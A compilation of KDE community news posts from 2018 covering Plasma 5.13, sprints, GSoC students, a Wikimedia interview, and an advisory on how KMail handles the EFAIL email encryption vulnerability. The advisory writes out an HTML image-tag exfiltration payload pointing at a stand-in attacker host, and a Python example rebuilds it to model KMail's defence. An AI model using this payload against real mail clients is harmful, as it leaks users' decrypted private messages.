If there is one document you want to read to discover what KDE has been up to and where we are right now, this is the one.
KDE's yearly report gives a comprehensive overview of all that has happened during 2017. It covers the progress we have made with KDE's Plasma desktop environment; Plasma Mobile (KDE's graphical environment for mobile devices); and applications the community creates to stimulate your productivity, creativity, education, and fun.
The report also looks at KDE's activities during 2017, giving details on the results from community sprints, conferences, and external events the KDE community has participated in worldwide. It also covers what is probably the most important community milestone of 2017: defining and agreeing on what are the most important global goals, goals that will direct the efforts of KDE community members for years to come.
You can also find out about the inner workings of KDE e.V., the foundation that legally represents the community. Check KDE's financial status and read up about the KDE e.V. board members, the different working groups, the Advisory Board, and how they all work together to keep KDE moving forward.
Optimized and less resource-hungry, Plasma 5.13 can run smoothly on under-powered ARM laptops, high-end gaming PCs, and everything in between.
Feature-wise, Plasma 5.13 comes with Browser Integration. This means both Chrome/Chromium and Firefox web browsers can be monitored and controlled using your desktop widgets. For example, downloads are displayed in the Plasma notification popup, so even if your browser is minimized or not visible, you can monitor the download progress. Likewise with media playing in a tab: you can use Plasma's media controls to stop, pause and silence videos and audio playing in any tab – even the hidden ones. This is a perfect solution for those annoying videos that auto-start without your permission. Another Plasma-browser feature is that links can now be opened from Plasma's overhead launcher (KRunner), and you can also send links directly to your phone using KDE Connect.
Talking of KDE Connect, the Media Control Widget has been redesigned and its support of the MPRIS specification has been much improved. This means more media players can now be controlled from the media controls in the desktop tray or from your phone using KDE Connect.
Plasma 5.13 is also visually more appealing. The redesigned pages in 5.13 include theming tools for desktops, icons and cursors, and you can download new splash screens from the KDE Store directly from the splash screen page. The desktop provides a new and efficient blur effect that can be used for widgets, the dashboard menu and even the terminal window, giving them an elegant and modern look. Another eye-catching feature is that the login and lock screens now display the wallpaper of the current Plasma release, and the lock screen incorporates a slick fade-to-blur transition to show the controls, allowing it to be easily used as a screensaver.
Discover, Plasma's graphical software manager, improves the user experience with list and category pages that replace header images with interactive toolbars. You can sort lists, and they also show star ratings of applications. App pages and app icons use your local icon theme to better match your desktop settings.
Vaults, Plasma's storage encryption utility, includes a new CryFS backend, better error reporting, a more polished interface, and the ability to remotely open and close vaults via KDE Connect.
Connecting to external monitors has become much more user-friendly. Now, when you plug in a new external monitor, a dialog pops up and lets you easily control the position of the additional monitor in relation to your primary one.
Claudia graciously met up with us (Ivana and Paul) to tell us all about her job, how the Wikipedia community works and the challenges it faces.
This is what she told us:
Paul: Welcome, Claudia, and thank you for joining us!
Claudia: Thanks for having me :-)
Ivana: Hello Claudia!
Paul: So you are the Executive Director of Wikimedia Foundation Austria, correct?
Claudia: Correct. Since 2012. It's actually called "Wikimedia Österreich". The Foundation is only the organization in San Francisco.
Paul: Thanks for the clarification. Tell us... What led you to this job? Did you do something similar before?
Claudia: I used to work as Head of Marketing and Communication for a major applied science organization in Germany. We were pioneers in the field of online science communication in the German-speaking world. Beyond the focus on online communication, I think the common denominator of those two jobs is making knowledge accessible.
Paul: Of course. What does a typical day at Wikimedia look like for you? What do you do there?
Claudia: I'm not sure I have a typical day. We work closely with volunteers, so our working hours vary. We often work in the evenings or on weekends when our Wikimedians are available. I also work not only from our office, but frequently remotely when I travel for work.
Paul: So do you oversee their work? Make sure the rules for editing articles are respected? Organize events? All of the above?
Claudia: Wikimedia staff does not intervene into the work on the Wikimedia projects. The community decides about the rules and how to enforce them; we do not have any direct influence there.
But the task that follows me everywhere and at any time is to secure funds for our organization, i.e. fundraising, grant-making and reporting. Apart from that, one of my main tasks is to build partnerships within the Wikimedia movement, but also beyond. With like-minded communities, cultural institutions, potential donators, and so on.
Ivana: I take it that you face the challenge of working with people from different time zones. Could you share some advice or tools that you use to overcome scheduling issues?
Claudia: I don't think we have super-innovative approaches in that regard. For us in Austria, it's mainly Europe and the US so far, and we found the time slots that work for most. I think the Wikimedia Foundation has probably more refined ideas, as they work with a more diverse group, but I wouldn't know the details.
Paul: Talking of diverse, I understand you also deal with diversity and inclusion issues. How do you promote these two things?
Claudia: Due to our "hands off" approach, we can only deal with diversity and inclusion issues indirectly: by raising awareness for the topic, encouraging mentorship, fostering solidarity networks among volunteers, and providing incentives and support for all of that. One example is the mentoring program we developed for the Wikimedia Hackathon last year. We wanted to create a welcoming atmosphere for newcomers that is reflected in the physical space, as well as in the social interactions.
Paul: Is there a lack of diversity within the Wikipedian community?
Claudia: It always depends on the definition of diversity, and it varies between our communities. Speaking for our Austrian communities: it is diverse in some regards, like age, and not very diverse in others, such as gender or ethnical background.
Paul: So do you know what percentage of women Wikipedians versus men there are, for example? The percentage for each ethnicity? Is this information you collect?
Claudia: There are roughly 10% female contributors in the German-language Wikipedia, and that reflects what I see during offline events. Non-binary is probably around 1-2%. But the numbers are not all 100% accurate, as many volunteers choose not to disclose their gender, and we respect their wish for anonymity. That is even more true for ethnicity - we do not ask for that anywhere. This is what you can get from the information people provide on their user pages. Apart from that, we do not collect any personal data.
But there are other ways to make the diversity gaps visible: by comparing the number of biographies about females to the number of articles about men. Wikidata makes that really easy nowadays. Or by looking at the language and perspectives that are represented in articles. It becomes obvious very quickly that we have a problem there, and that should be fixed if we strive to collect "the sum of all human knowledge" as our vision statement says.
Paul: How do you solve this problem? Getting back to the activity you mentioned before, for example - how do you make a hackathon more welcoming? What do you physically do?
Claudia: For the first time we had mentors at such an event. Their only job was to help newcomers and to pair them with other newcomers according to common interests. Usually the mentors had project ideas that were suitable for newbies to get started. The aim was that every newcomer could be part of a team that accomplished something during the weekend, and to be able to present a project at the showcase on the last day.
To make it as easy as possible to approach people, we also had a mentoring area where people could come at any time to ask questions or get help. Our Austrian community held pre-events, so people could get to know each other in smaller, more intimate surroundings before they were thrown into an international event with 250 strangers. Finally, we had an outreach coordinator who facilitated the mentor-to-mentor and mentor-to-mentees exchange before, during, and after the event.
Other ways to make event spaces inclusive are gender-neutral bathrooms, designated "quiet zones" where people can retreat to when they need a break from social interaction, stickers to customize your name badge with information about yourself that can also include how you want to be addressed in terms of gender, etc.
Many of these ideas were adapted from a youth hack event called "Jugend Hackt" that is a project of Open Knowledge in Germany and Austria.
Ivana: It sounds like you're really taking care of new contributors, which is awesome! It's something we're trying to be better at in our community, too. Could you tell us a bit about the onboarding process - what does it look like when someone new wants to join and start contributing? Are there any "best practices" or recommended ways to get started?
Claudia: We learned that the best way to onboard newcomers is regularity; it's hard to achieve much with a single event. So having mentors beyond the event helps, or having regular events or follow-up events, where people can come back to when they encounter barriers. It can be further assisted with social media - chat groups and the like. Places where people can find help and advice on short notice online.
Ivana: Have you had any students or new contributors join Wikimedia Österreich through mentorship projects like Outreachy, Google Summer of Code or similar? Do you organize similar programs on a local scale, i.e. in the German-speaking communities?
Claudia: We have had newcomers join via local mentoring programs, but not via the global programs you mentioned.
Ivana: Do you have something like a list of "junior jobs" or easy tasks that newcomers can immediately tackle? Or if you've tried a similar approach in the past, can you tell us how that worked?
Claudia: We tried the easy task list for the Wikimedia Hackathon last year. The list was linked from the event page so people could check it out beforehand. Apart from that, there were also other tasks to help around the event that were not related to coding: writing blog posts, making a podcast, taking pictures, helping the organizers on site...
Ivana: Getting back to the topic of helping newcomers, you mentioned potential barriers they can encounter. In your experience, what are the most common barriers, or obstacles that newcomers have reported? And how have you worked on resolving them?
Claudia: I think for most newcomers the hardest part is to see where they could help and how. So the task list and mentors can help with that. However, we also still have room for improvement: After the hackathon, many newcomers complained about how long it took to get a code review. Often keeping people engaged after an event is the hardest part. For newcomers and mentors alike.
In the end, it is a question of resources. If we want new people, and especially underrepresented people, we will have to invest resources into this endeavour. Half-assed approaches usually don't work in the long run, and I'm afraid that this is something we still have to internalize as a movement.
Paul: What about problems from the old-timers? Is there any resistance from the existing community towards the effort to promote more diversity?
Claudia: Of course there are parts of the community who are indifferent, and some who openly work against such topics. So the art is to find the people who support the idea and include them, to address justified concerns, and ignore, or if there is no other way, get rid of people that display toxic behavior.
Paul: What sort of problems do you see a lack of diversity causing?
Claudia: For Wikipedia it is clear: the sum of all knowledge can not be gathered and represented by a small homogeneous group. Furthermore, quality and objectivity of knowledge are also important values in our movement that can only be achieved by including diverse perspectives.
Paul: For somebody who wanted to join in the Wikipedia effort... What advice would you give them? What should they read? Where can they start?
Claudia: Most Wikipedias have extensive guides on how to get started. Too extensive sometimes :-). I would see whether there is a mentoring program on your Wiki project and sign up, or whether there are local Wiki meet-ups in your home town. In Vienna, for example, we have a Wikipedia clinic for newcomers every first Tuesday of the month.
Paul: A Wikipedia clinic! What do you do there?
Claudia: It's basically where you can come to discuss and find help for common problems. I think there are code clinics at some events too. It's a peer approach to exchange best practices around common issues or challenges.
Paul: Is there a trend? Like problems that new contributors come up with again and again? If so, what are they?
Claudia: I think the challenges for newcomers vary between the projects. In the German language Wikipedia, the biggest issues are certainly the complexity that results from an elaborate rule set to ensure quality of content; the fact that most topics of general knowledge are fairly well covered so you need to find your expert niche to contribute; and the often not very newcomer-friendly atmosphere and aggressive interactions.
Paul: I suppose people feel possessive about what they work on. Is there any sort of regulatory body that helps resolve disputes or reprimands antisocial behavior?
Claudia: There are community-elected arbitration committees to solve conflicts on projects. But in some cases, especially when there is also offline harassment involved, the Wikimedia Foundation has to take steps to ban those people from events, the projects, or both in order to protect others.
Paul: I guess it is normal that in such a big community you will have all sorts of people...
Moving on to happier topics. Apart from actually writing or expanding Wikipedia articles, what are other things contributors can do to help Wikipedia grow and thrive?
Claudia: Other ways to contribute to Wikipedia are to help build the software behind MediaWiki, or to take freely licensed pictures for Wikipedia & Co and upload them to Wikimedia Commons. There are also all the other sister projects such as Wikivoyage, Wiktionary, or Wikidata.
Paul: I guess donations also help, right? Where can we go and donate?
Ivana: And we look forward to your keynote at Akademy!
Claudia: Thanks! Looking forward to meeting you in person!
Claudia will be delivering the keynote at Akademy 2018 on the 12th of August. Come to Akademy and find out live how you too can make your community more diverse and inclusive.
For most of the year, KDE -- one of the largest free and open software communities in the world -- works on-line by email, IRC, forums and mailing lists. Akademy provides all KDE contributors the opportunity to meet in person to foster social bonds, work on concrete technology issues, consider new ideas, and reinforce the innovative, dynamic culture of KDE. Akademy brings together artists, designers, developers, translators, users, writers, sponsors and many other types of KDE contributors to celebrate the achievements of the past year and help determine the direction for the next year. Hands-on sessions offer the opportunity for intense work bringing those plans to reality. The KDE Community welcomes companies building on KDE technology, and those that are looking for opportunities.
Between the 23rd and 25th of March, KDE Connect developers gathered in Verse's offices in Barcelona to work together for a weekend. It was the first meeting KDE Connect had in a while, and it was very productive!
It's been some time since the sprint, and the work carried out there has already started to trickle down into our devices. Nevertheless, we wanted to shed some light on our accomplishments, and encourage everyone to participate.
Holding discussions and making decisions is much easier in person. We kicked off the sprint by going through our backlog of ideas to decide what was worth implementing. That helped us set the focus for the sprint and resume some blocked tasks.
One of the most requested features for KDE Connect is the ability to send SMS from the desktop. We already supported SMS to a certain degree with the ability to reply to a message. Some people have even set up Kontact to be able to send texts using KDE Connect from there, but it can be annoying to use without conversation history. During the sprint, Simon and Aleix started working on a fully-featured interface for sending SMS easily from the desktop that includes full conversation views and a full contact list.
Aleix and Nico polished the Run Commands interface to make it more discoverable, so that we can easily configure KDE Connect to do anything we want.
Matthijs improved the functionality of multimedia controls - now it's possible to display the album art from your desktop on your Android devices (both on the lock screen and in the new multimedia notification). Meanwhile, Aleix and Nico started paving the way towards better integration with PulseAudio control, sharing some code between KDE Connect and the Plasma volume control.
A less visible but crucial part of what makes KDE Connect so useful is its integration with the system. Albert Vaca worked on a KDE Connect plugin for Nautilus, so people who don't use Plasma and Dolphin can also have a great user experience.
Another very important but often-overlooked task is documentation. Matthijs invested some time in improving the onboarding process for new contributors. Hopefully we'll get more people involved in the future!
Last but not least, we fixed some ugly bugs during this sprint. Albert Astals fixed a long-standing crash in KIO, the KDE Framework used by KDE Connect for transferring files. Simon and Albert Vaca took care of some compatibility problems with Android Oreo, while Matthijs fixed a connectivity issue and even made some progress on Bluetooth support.
All in all, the sprint was a pleasant event, and I'm really happy we all got together. It was nice to meet the developers working on KDE Connect, to connect faces with nicknames, and generally agree on a common path we will follow in future development.
Big thanks to KDE e.V. for sponsoring the travel - without their help, this sprint wouldn't have been possible.
February was a big month for the Promo team - we held a long-awaited sprint in Barcelona, Spain from the 16th to 18th. The aim of the sprint was to look at information we had collected over the prior years, interpret what it meant, and use it to discuss and plan for the future. The activities we came up with should help us accomplish our ultimate goal: increasing KDE's visibility and user base.
Nine members of the team made it to Barcelona: Aleix Pol, Ivana Isadora Devčić, Jure Repinc, Kenny, Łukasz Sawicki, Lydia Pintscher, Neofytos Kolokotronis, Paul Brown, and Rubén Gómez. We met at Espai 30, an old factory converted into a social center for the neighborhood. Coincidentally, that is one of the places where the Guifi.net project started -- rather fitting for a meeting that comprised Free Software and communication.
Day 1: Informal Afternoon Meeting
Although Friday was "arrival day" without an official agenda, we could not resist talking shop over pizza and beer. Discussions gravitated towards the KDE.org website, which will be migrated from an old and clunky backend to a WordPress framework. The improvement to the framework got us thinking on how we could improve the content, too.
The consensus was that we want to inform the general public about what KDE is - not a desktop, but the community that creates, maintains, documents, translates, and promotes a large body of multi-purpose software. Our software collection does include a desktop environment, but it also offers utilities, games, productivity applications, media players and editors, an environment and applications for mobile phones, development frameworks, and much more.
We should also make sure the website caters equally to the tech savvy and unsavvy, since KDE's software is meant for everybody. The new site should clearly direct users to our products, allowing end users to simply download and use them. At the same time, the website should ease the way for potential contributors to join the community.
Day 2: Espai 30, Stats stats stats, and Improved Communication
At the break of dawn the next day... well, actually, at 10 o'clock, sprint sessions started in earnest. Ivana gave a recap of Promo's main activities over the last year or so, revisiting funding campaigns we promoted and communication tactics we implemented.
Next we looked at hard, cold data, collected from social media accounts, web statistics, and distro popcons (application popularity contests). The bad news is that visits to our main sites have gone down over the last year. The good news, however, is that followers and interactions on social media have seen a significant increase. Although data collected from popcons are partial, it also looks like Plasma's user base is growing steadily.
Want to help us with data-collecting and processing, or have ideas about where we can collect more useful information? Send your suggestions to our mailing list and we'll look into it.
The data also helps us pinpoint wins and fails in our approach to communicating with the outside world. We found a direct relation between the traffic to our news site (dot.kde.org) and to the main kde.org website. Therefore it makes sense to seriously work on increasing the traffic to kde.org first, in order to improve the visibility and effectiveness of our announcements and campaigns. We also identified ways to make our social media posts more attractive, which should help them garner more re-tweets, boosts (the equivalent of re-tweets in Mastodon), shares and upvotes, and spread our messages further.
Another way of reaching more people is through events. We discussed Akademy and our plans for promoting the 2018 edition before and during the event, so that news coming out of Vienna in August can reach as many people as possible.
We also talked about visiting other technical and even not-so-technical events. By showcasing our applications and letting users play with them, we think we will be able to increase our user base. In any case, we need to be well-prepared for all types of conferences, so we made a list of essentials based on our previous experiences.
We noticed that even within the FLOSS community, there is a large portion of businesses, organizations and developers who are unaware of technologies that KDE develops. Speaking and setting up booths at technical, but non-KDE/Qt events (like the upcoming Embedded Linux Conference organized by the Linux Foundation), could help solve this problem and even attract contributors for KDE.
Do you have suggestions for events we should attend? Join the Attend External Events task and tell us about them.
One of the things we have started doing, for example, is creating a list of simple tasks for beginners. We are also trying to identify where people struggle in the process of joining Promo, and working on eliminating obstacles. On a more one-to-one basis, we want to be able to identify people's skills so we can direct them to teams they can join. This was one of the topics we tackled during the last day of the sprint.
Day 3: Teams, Market Research, and Publicity Stunts
For example, we'd like to have a smoother communication channel with developers, so that we can better understand their work and advise them on how to promote it. The best way to do this, we thought, would be to recruit developers already in the Promo group as liaisons with their colleagues.
Likewise, experienced YouTubers and videographers can create promotional videos for product releases; journalists and editors can write or help improve blog posts and news articles; and people with a background in marketing can use their knowledge to do some serious market research.
That last thing is important because the Promo team must discover what technologies people use, how they use them, and what they like and dislike about them to be able to market KDE products. We decided to take a step back and work on a market research project that will provide us with solid information on which to base our actions.
At the same time, we can entice people to use Plasma and KDE applications with straightforward advertising, or rely on the more subtle art of product placement. Regarding the former, we looked at publicity stunts that had helped other community projects in the past, like full page ads in prominent newspapers, or messages on public transport. For example, ads at bus stops in university areas may help encourage students to join the community.
Got an idea for an advertising campaign that is both effective and cheap to carry out? Share it with us!
As for the latter, it turns out that TV shows and movies sometimes have a hard time when they want to show a flashy computer or mobile device interface. Because they can be endlessly customized, Plasma, Plasma Mobile and the applications that run on them are perfect candidates for the likes of The Blacklist, CSI Cyber, Mission Impossible 7... Okay, maybe we will have to start more modest, but remember that KDE tech was already featured on Mr Robot, albeit as the choice of the villain.
Do you know somebody with a solid audience on the fringes of open sourcedom that could influence a large group of people? Go and add them to the list.
We also want to improve our presence in businesses. To do that, we would first have to approach businesses and contractors that already work with KDE/Qt-based technologies. The idea is to get them on board and create a marketplace/support network that other companies can rely on when considering a migration to desktop Linux.
While brainstorming other ways to increase awareness, we realized we could improve videos and help them reach a wider audience by adding subtitles. If you would like to help create subtitles in your language, sign up for the video group and tell us what you can do.
This was an intense and intensive sprint. The full list of topics we discussed is longer than this report, but we managed to devote enough time to the most pressing issues. We came up with ideas for targets and ways to work towards them that will translate into real results. We are now progressively implementing tasks that will help us reach those targets, but we need your help.
If you think you can help us achieve our goals, please join the Promo group. We have a mailing list, IRC channel, and a Telegram group. You can also take a look at our workboard and leave your feedback on tasks that are in progress.
Developing KDE's software is super-important, but so is spreading the message that the software exists and that everybody, regardless of their level of computer-literacy, can and should use it. That is what the Promo team is all about, and we will keep practicing what we preach.
Thursday, 17 May 2018. Today KDE unveils a beta release of Plasma 5.13.0.
Members of the Plasma team have been working hard to continue making Plasma a lightweight and responsive desktop which loads and runs quickly, but remains full-featured with a polished look and feel. We have spent the last four months optimising startup and minimising memory usage, yielding faster time-to-desktop, better runtime performance and less memory consumption. Basic features like panel popups were optimised to make sure they run smoothly even on the lowest-end hardware. Our design teams have not rested either, producing beautiful new integrated lock and login screen graphics.
KDE Student Programs is happy to present our 2018 Google Summer of Code students to the KDE Community.
Welcome Abhijeet Sharma, Aman Kumar Gupta, Amit Sagtani, Andrey Cygankov, Andrey Kamakin, Anmol Gautam, Caio Jordão de Lima Carvalho, Chinmoy Ranjan Pradhan, Csaba Kertesz, Demetrio Carrara, Dileep Sankhla, Ferencz Kovács, Furkan Tokac, Gun Park, Iván Yossi Santa María González, Kavinda Pitiduwa Gamage, Mahesh S Nair, Tarek Talaat, Thanh Trung Dinh, Yihang Zhou, and Yingjie Liu!
This year digiKam, KDE's professional photo management application, has three students: Tarek Talaat will be working on supporting Twitter and One Drive services in digiKam export, Thanh Trung Dinh on Web Services tools authentication with OAuth2, and Yingjie Liu on adding the possibility to manually sort the digiKam icon view.
Plasma, KDE's graphical desktop environment, will also be mentoring three students. Abhijeet Sharma will be working on fwupd integration with Discover (KDE's graphical software manager), Furkan Tokac will improve handling for touchpads and mice with Libinput, and Gun Park will port keyboard input modules to Qt Quick and expand scope to cover input method configuration for System Settings.
Another project with three students is Krita, KDE's popular graphic editor and painting application. Andrey Kamakin will improve multithreading in Krita's Tile Manager; Iván Yossi Santa María González (ivanyossi) will optimize Krita Soft, Gaussian and Stamp brushes mask generation to use AVX with Vc Library; and Yihang Zhou (Michael Zhou) is creating a Swatches Docker for Krita.
GCompris, the suite of educational programs and games for young learners, takes two students: Aman Kumar Gupta will port all GTK+ piano activities and get it one step closer to version 1.0, and Amit Sagtani will work on creating bitmap drawing and animation activities while preparing GCompris for version 1.0.
LabPlot, KDE's application for scientific data plotting and analysis, also mentors two students. Andrey Cygankov will add support for importing data from web services in LabPlot, and Ferencz Kovács will be working on plotting of live MQTT data.
Okular, KDE's PDF and document viewer, gets another two students: Chinmoy Ranjan Pradhan will be working on verifying signatures of PDF files, while Dileep Sankhla will implement the FreeText annotation with FreeTextTypeWriter behavior.
Csaba Kertesz (kecsap) will aim to improve the desktop and the Android version of KStars, KDE's planetarium program, while Kavinda Pitiduwa Gamage will work on KGpg, KDE's graphical key management application, to make it better.
Mahesh S. Nair will expand Peruse Creator, adding more features to KDE's easy-to-use comic book reader. Finally, Demetrio Carrara will be working on the WikitoLearn production-ready Progressive Webapp (PWA).
Traditionally, Google Summer of Code starts with an introduction period where students get to know their mentors, after which they start coding. The coding period for 2018 began on May 14, and will last until August 6. We wish all our students a productive, successful, and fun summer!
On Monday, a security vulnerability in the OpenPGP and S/MIME email encryption standards and the email clients using them, called EFAIL, was published.
What is this about and how is KMail affected? (Spoiler: KMail users are safe by default.)
The discovered vulnerability affects the OpenPGP and S/MIME standards used for end-to-end encryption, which encrypts emails specifically for the intended receivers. This is not to be confused with transport encryption (typically TLS) that is used universally when communicating with an email server. Users not using OpenPGP and S/MIME are not affected by this vulnerability.
End-to-end encryption is usually employed to prevent anyone other than the intended receiver from accessing message content, even if they somehow manage to intercept or accidentally receive an email. The EFAIL attack does not attempt to break that encryption itself. Instead, it applies some clever techniques to trick the intended receiver into decrypting the message, and then sending the clear text content back to the attacker.
KMail relies on GnuPG for the OpenPGP and S/MIME handling, so you might also be interested in the GnuPG team's statement on EFAIL.
The EFAIL research paper proposes several exfiltration channels for returning the clear text content. The easiest one to understand is by exploiting the HTML capabilities of email clients. If not properly controlled, HTML email messages can download external resources, such as images, while displaying an email - a feature often used in corporate environments.
Considerably simplified, the idea is to add additional encrypted content around an intercepted encrypted message. The whole procedure for doing this is quite elaborate and explained in depth in the paper. Let's assume an attacker manages to prefix an intercepted encrypted email with the (encrypted) string "<img src='http://my.site/?" and append an extra "'/>". The result would look something like this, after decryption by the receiver:
An email client that unconditionally retrieves content from the Internet while displaying HTML emails would now leak the email content as part of an HTTP GET request to an attacker-controlled web server - game over.
The OpenPGP standard has a built-in detection mechanism for manipulations of the encrypted content. This provides effective protection against this attack. KMail, or rather the GnuPG stack KMail uses for email cryptography, does make use of this correctly. Not all email clients tested by the EFAIL authors seem to do this correctly, though. Notwithstanding, your OpenPGP encrypted emails are safe from this attack if you use KMail.
The situation with S/MIME is more difficult, as S/MIME itself does not have any integrity protection for the encrypted content, leaving email clients with no way to detect the EFAIL attack. That's a conceptual weakness of S/MIME that can only really be fixed by moving to an improved standard.
Fortunately, this does not mean that your S/MIME encrypted emails cannot be protected in KMail. By default, KMail does not retrieve external content for HTML emails. It only does that if you either explicitly trigger this for an individual email by clicking the red warning box at the top of emails which informs of external content, or if you enable this unconditionally via Settings > Configure KMail > Security > Reading > Allow messages to load external references from the Internet. Starting with version 18.04.01, the latter setting will be ignored for S/MIME encrypted content as an additional precaution. For older versions, we recommend you make sure this setting is disabled.
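The default described above can be modelled in a few lines. This is an added example, not KMail's or GnuPG's code: it lists the remote references in a decrypted HTML part and shows what would travel in request URLs under each setting. The function names, the attribute list and the sample message are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser

# Attributes whose URL an HTML renderer fetches just by displaying the message.
FETCH_ATTRS = {"src", "srcset", "background", "poster"}
REMOTE = re.compile(r"\s*(?:https?:)?//", re.IGNORECASE)


class ExternalRefFinder(HTMLParser):
    """Collect (tag, attribute, url) for every remote fetch the HTML would trigger."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in FETCH_ATTRS and value and REMOTE.match(value):
                self.refs.append((tag, name, value))


def external_refs(html):
    finder = ExternalRefFinder()
    finder.feed(html)
    finder.close()
    return finder.refs


def may_fetch(allow_external, smime_encrypted):
    """Model of the policy in the text (assumed simplification): off by default,
    and the global opt-in is ignored for S/MIME-encrypted content."""
    return allow_external and not smime_encrypted


def exposed_text(html, allow_external=False, smime_encrypted=False):
    """Return the text that would travel in request URLs if the part were rendered."""
    if not may_fetch(allow_external, smime_encrypted):
        return []  # nothing is requested, so nothing leaves the machine
    return [url.partition("?")[2] for _, _, url in external_refs(html)]


# Constructed sample: the decrypted result from the article's simplified scenario.
SECRET = "Meeting moved to 9pm, room 4\n"
DECRYPTED = "<img src='http://my.site/?" + SECRET + "'/>"
```

With the defaults, `exposed_text(DECRYPTED)` is empty; the plaintext only appears in a request URL when external references are allowed and the part is not S/MIME encrypted.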
Furthermore, distribution maintainers can get patches to solve this problem from here:
In order to revoke compromised signing keys, S/MIME relies on certificate revocation lists (CRLs) or the online certificate status protocol (OCSP). These two mechanisms consult an online server defined by the authority managing the respective keys. The EFAIL paper suggests that this might be another possible exfiltration channel, in addition to HTML. However, this hasn't been demonstrated yet, and the GnuPG team thinks it is unlikely to work. It is also a relevant piece of the S/MIME security model, so simply disabling this as a precaution has security implications, too.
Therefore, we have not changed the default settings for this in KMail at this point. The reason is that compromised and thus revoked keys seem to be a more common concern than an elaborate targeted attack that would employ CRL or OCSP as an exfiltration channel (if possible at all). You'll find the corresponding settings for the CRL and OCSP usage under Settings > Configure KMail > Security > S/MIME Validation should you want to review or change them.
Research in email client and email cryptography security is very much appreciated and badly needed, considering how prevalent email is in our daily communication. As the results show, S/MIME is showing its age and is in need of conceptual improvements. Also, EFAIL again highlights the dangers to privacy caused by HTML emails with external references. Most importantly, this shows that your emails are well-protected by KMail and GnuPG, and there is certainly no reason to panic and stop using email encryption.
That said, it's not too early to start planning for Akademy 2019!
In fact, we are now opening the Akademy 2019 Call for Hosts, and looking for a vibrant spot and an enthusiastic crew that will host us.
Would you like to bring Akademy, the biggest KDE event, to your country? Read on to find out how to apply!
A Bit About Akademy
Akademy is KDE's annual get-together where our creativity, productivity and community-bonding reach their peak. Developers, users, translators, students, artists, writers - pretty much anyone who has been involved with KDE - will join Akademy to participate and learn. Contents will range from keynote speeches and two days of dual track talks by the FOSS community, to workshops and Birds of a Feather (BoF) sessions where we plot the future of the project.
The first day serves as a welcoming event. The next two days cover the keynote speakers and other talks. The remaining days are used for BoF sessions, intensive coding and workshops for smaller groups of 10 to 30 people. One of the workshop days is reserved for a day trip, so the attendees can see the local tourist attractions.
What You Get as a Host
Hosting Akademy is a great way to contribute to a movement of global collaboration. You get a chance to host one of the world's largest FOSS communities with contributors from across the globe, and witness a wonderful week of intercultural collaboration in your home town.
You'll get significant exposure to the Free Software community, and develop an understanding of how large projects operate. It is a great opportunity for the local university students, professors, technology enthusiasts and professionals to try their hand at something new.
What We Need from a Host
Akademy requires a location close to an international airport, with an appropriate conference venue that is easy to reach. Organizing Akademy is a demanding task, but you’ll be guided along the entire process by people who’ve been doing it for years. Nevertheless, the local team should be prepared to invest a considerable amount of time into organizing Akademy.
During the sprint, the Plasma team was joined by guests from Qt and Sway WM. Discussion topics included sharing Wayland protocols, input methods, Plasma Browser Integration, tablet mode for Plasma's shell, porting KControl modules to QtQuick, and last but not least, the best beer in Berlin.
Constructive Discussions with SwayWM - Check!
The effort to port Plasma to work on Wayland rather than X continues at a fast pace. Wayland protocols define how applications interact with the display, including tasks essential to Plasma such as declaring which "window" is really a panel. These protocols have to be defined by the Plasma team and preferably standardized with other users of the Linux desktop.
One newcomer to the field is SwayWM - a Wayland version of the i3 window manager. Drew DeVault, the lead developer of the project, joined our Plasma sprint to discuss where Wayland protocols could be shared. The team looked at their Layer Protocol, which covers much of the work of the current plasmashell protocol. We found that this protocol contains some nice ideas and suggested some improvements for the SwayWM developers.
The Plasma Output Management Protocol was also discussed. This protocol defines how external monitors are used, and Sway currently just reloads configuration files as needed. The team will consider this solution if the need for such a protocol arises. Protocols for Remote Access were compared and reviewed along with Pipewire as systems for managing audio and video. Drew wrote a blog post with more information on this topic.
Exciting Collaboration with Qt - Check!
Shawn Rutledge, the lead developer of Qt's new input stack, also joined us for a few days of the sprint. Together, we reviewed the new API and looked at how some of the unique use-cases of Plasma would work with it. The conclusion was that "some parts, including complex drag-and-drop actions, went surprisingly smoothly".
A bunch of design changes were suggested and improvements submitted. Working with Qt developers at this early stage is a great win for both projects, as it saves KDE developers a lot of time when they come to use the new features, while the Qt world gets a nicer result.
Improved Plasma Browser Integration - Check!
Plasma Browser Integration is a fun new feature that will be shipped with Plasma 5.13 next month.
It means Firefox and Chrome/Chromium will use Plasma's file transfer widget for downloads and native Plasma notifications for browser notifications. Moreover, media controls will work with the task manager.
The browser extensions were tidied up, translations fixed, and accounts on the relevant browser store websites set up. Another decision made at the sprint was that we have a collective duty to make sure KDE's new web browser Falkon is at feature-parity in terms of Plasma integration.
Plasma on Pinebook and Tablet Mode - Check!
The team continued to work on convergence with other form factors - in other words, on making Plasma run seamlessly on a variety of devices, both desktop and mobile. Bhushan worked on Plasma Mobile images for devices that support the upstream kernel, which is essential for security and a more up-to-date system on mobile devices.
Rohan worked on making Plasma run smoothly and with all Free drivers on the low-end Pinebook laptop. This goes to show that Plasma can function as a lightweight desktop environment without losing features.
Lastly, Marco managed to get Plasma working on a convertible laptop with support for switching into tablet mode, illustrating how we can actively shift between form factors.
Talks, Burritos, and Beer - Check!
Throughout the week, we also gave talks to our host company Endocode who kindly lent us their central Berlin offices, complete with a fridge full of alcohol-free beer.